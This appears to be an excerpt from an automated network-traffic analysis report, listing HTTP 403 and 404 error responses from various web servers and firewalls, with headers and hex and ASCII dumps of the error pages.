                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 05 Jul 2023 06:07:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 62 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:08 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j6u9tdyA%2B4O%2FFwiHVpRHdG1BCTlQYSdVtdTCa0cfJvlLWrH6FE2fgx3rq5D3x3ZeuebBNHAGL%2FBSpT89%2BzwJouY1wwzUkeQ%2BdnEvLl6ik1ZMAS%2BvecWoPIRlNZbi150%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6d10cb28bbdd-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:09 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MB4e6phcIblnptVhIlpm4GJaJxIJ2EClr6YPQ99t9NhMEFa6K43FOqoohHtuLR8VPdAcFmEcRREngHT4mshADBzY02dJbIE%2FEpPdQD0Cc7PIJVHz6uh46S8cH%2F%2FoeQU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6d115be3bbdd-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:09 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0E4d1qhWTQNko%2B3cNe3jyccBcMYB6SnN32Ch2OT1vMNc9nDlA4XfuEMgZX7pWwYU72R5Ejcuo1PImjxoeN9bLtRt6u48eAdS1%2BhCbTW0pJ7c3okvOujbcqmBpQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6d121cab9238-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 64 65 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 Data Ascii: 1dea<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Typ
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:09 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mfwuZKJ4FDiJO4owJASYXYMhqlwBCusSfIps8ws2kjlr4LKuBp6JR%2Fm6KRurPAKUX0zFpRgTTBg9kpzwLhkYmP4oUhGMmTgjB5S2gXSlHOmVElnEaGFhz%2F5%2BQjI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6d123f5f6961-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:09 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Wed, 05 Jul 2023 06:07:09 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:09 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 05 Jul 2023 06:07:09 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 05 Jul 2023 06:07:09 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:09 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
